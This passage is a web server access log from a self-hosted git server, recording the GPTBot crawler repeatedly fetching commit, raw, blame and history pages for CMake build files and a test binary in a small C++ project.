+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?files=html%2fstatus.json" [Client 74.7.227.38] [Length 15610] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13350] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11403] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13478] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10935] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21645] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16188] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:15:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51205] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51206] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51203] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11825] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11260] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29810] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14638] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 